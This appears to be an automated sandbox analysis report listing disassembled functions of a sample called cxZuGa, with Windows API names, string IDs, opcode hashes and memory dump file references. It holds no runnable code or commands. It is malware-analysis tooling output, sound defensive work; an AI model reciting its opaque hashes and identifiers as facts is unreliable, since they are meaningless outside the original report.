                                                            • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                            • Instruction ID: 4409cc128d905e3ff55c31ffeaf8e1a6432dae6458a3f873c80983f29a92c3a8
                                                            • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                            • Instruction Fuzzy Hash: 18313876A0868187E760DF15F444B5AB7A1FB88B90F604236EB9843B58CF3CD841CF15
                                                            Function 00007FF7EC18F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                            • String ID: %s%d
                                                            • API String ID: 2330185562-1110647743
                                                            • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                            • Instruction ID: 68e7bb04a60eeff619cee32157cd89311416783f1a7403f17d60ded185404f6c
                                                            • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                            • Instruction Fuzzy Hash: 6D2130AAA08B8291EA14EB25F5443FAA351FB45BC0F944133DE9D07769DE3CE105C762
                                                            Function 00007FF7EC148782 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                            • Instruction ID: 14754ec627ab1d08513ae8701012e491d104148426fa22f833c1f3c649fad276
                                                            • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                            • Instruction Fuzzy Hash: 152143BA50474282E630EF11F04026EB760F785BA5F800236DE8D47B95DF3DE846C751
                                                            Function 00007FF7EC19C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID: 0
                                                            • API String ID: 33631002-4108050209
                                                            • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                            • Instruction ID: 46e39fa319498bd7ac9f1c54b964001dc8d6429b48ab6a0a81285b0e629df9db
                                                            • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                            • Instruction Fuzzy Hash: 12216D76618B80C6D3208F25F48469ABBB4F385794F544226EB9D03B98DF3CC655CB00
                                                            Function 00007FF7EC1BAF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC182DD1), ref: 00007FF7EC1BAF37
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC182DD1), ref: 00007FF7EC1BAF4F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                            • Instruction ID: ea7c09b9147701eff026977770392a991fa0badd9bcc8287d5b43493c9d02c37
                                                            • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                            • Instruction Fuzzy Hash: 4BF012E5905B0591EF04AB50F444368A3E4FF08B4AFC44436C91D05354EF7CD568C321
                                                            Function 00007FF7EC126D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                            • Instruction ID: 901b4cbe324cff38dd6e002ba0eb51d1f37f93e9d0bd6a18f9a4fa6b4d680d14
                                                            • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                            • Instruction Fuzzy Hash: 44E06DA9906F0A82EF18AB10F44436863E5FB08B8AF840832C90C01394EF7CE5A4C361
                                                            Function 00007FF7EC1C10C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                            • Instruction ID: 5c568a3b29aa52c3a4ddb6d900185672163187f014240c3fd5c10c78fc8f3b55
                                                            • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                            • Instruction Fuzzy Hash: 1FE06DA9A09B06C2FF09AB20F41432863A4EF08B55F840432D91D45354EF7CD5A5C351
                                                            Function 00007FF7EC1B7634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                            • Instruction ID: c25a50053796a90138a2f29670a52bffd9b3d6b50f6a837e14560608ad6f7262
                                                            • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                            • Instruction Fuzzy Hash: 5DE06DA9905B0682FF04AB10F84437863E0FB08B49FC40436D90C01354EF7CD9A9D361
                                                            Function 00007FF7EC1B79D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                            • Instruction ID: 821d81e576765d7bdc1222456626c618220fa38a99dab9eedb71957710abb1fa
                                                            • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                            • Instruction Fuzzy Hash: 34D15DBAB04B41DAEB10EB65E4802ECB7B1FB44788B804436DE0D57B59DF38D519C3A5
                                                            Function 00007FF7EC19BAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                            • Instruction ID: a1b22f45dd3eabf4e151f27b61ceaddc56e413e371a49762ad66f92c5aa9278d
                                                            • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                            • Instruction Fuzzy Hash: 7E5100AAB05A0185EF60EF6AE8406ACA3B2FB05BD4B944132DE0D53798DF3CD542C321
                                                            Function 00007FF7EC1B43C8 Relevance: 6.1, APIs: 4, Instructions: 126networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$socket
                                                            • String ID:
                                                            • API String ID: 1881357543-0
                                                            • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                            • Instruction ID: 180199b561b917478cd3d1f173607c066d427cee78f881752efb3027656191e1
                                                            • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                            • Instruction Fuzzy Hash: 7A418FA970868286DB14FF16F404769A790BB89FE4F844536DE5E1BB96CF3CD001C751
                                                            Function 00007FF7EC1A5DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                            • Instruction ID: ce7abb7d26a5b62165f9516ef60b7d78b21c72617c10f4a0727503a104862b50
                                                            • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                            • Instruction Fuzzy Hash: C641E1AA704B8681DB14EF26E49026DB7A0FB89FD4B889432DF4E47766DE3CD440D351
                                                            Function 00007FF7EC1CF014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                            • Instruction ID: da96a75b82db7c893328862ddbb72b38cbfde7bcfe2e40680657286e31d48d09
                                                            • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                            • Instruction Fuzzy Hash: E241B3BAA08A8685EB14EF19E884B79B7A4FB44B94F954137EE1D473A0DF3CE441C311
                                                            Function 00007FF7EC1CAA04 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID:
                                                            • API String ID: 3076010158-0
                                                            • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                            • Instruction ID: 218dd1791533f7ad660ef4b454b399ab91bc778eb13ffb38e5ee1b56868fc77f
                                                            • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                            • Instruction Fuzzy Hash: 82419ABAB00B418AEB24DF66E8407ADB7A1FB44B94FA44036DE0D13754CF38E8A5C751
                                                            Function 00007FF7EC15C72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                            • Instruction ID: 542ae078ab0e28bbc72ef963c9302802dbc47b2ff0edd42f4ec4ccf63b2eefe0
                                                            • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                            • Instruction Fuzzy Hash: 4B41B6BAA0C7428AFB61AF58F050379E691EF48B90F944132DB4906ED5DF3CD841C722
                                                            Function 00007FF7EC19BE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1083639309-0
                                                            • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                            • Instruction ID: 938838016fcf94d8756ad8d1f685e6c20a5d6bfb8e3895f0998c4fec78a9ec05
                                                            • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                            • Instruction Fuzzy Hash: 6D41BFAAA18A82C2E714FF65F4802AEE7A5FB84B84FD44073EA4E03655DF7CD506C711
                                                            Function 00007FF7EC198B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                            • Instruction ID: 703f1e6c49e3f12d11db8df63f49948eadef98f57f907caf4314b5f236dcc53a
                                                            • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                            • Instruction Fuzzy Hash: 0241F7E5A0D78241F730EB29B410BB9A6B2FB45B90F940573EA9E136D5CE3CD481C762
                                                            Function 00007FF7EC1CC580 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                            • String ID:
                                                            • API String ID: 3340791633-0
                                                            • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                            • Instruction ID: 572ef9136b33e8ff6d07f04a1fd06be96528e15d336c6caeeeb713f8aaf06861
                                                            • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                            • Instruction Fuzzy Hash: 4941C4B9E0855685F728AB15E560BF8A760EB84781F9C5033E60D037D5CE3CEC82C722
                                                            Function 00007FF7EC198CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
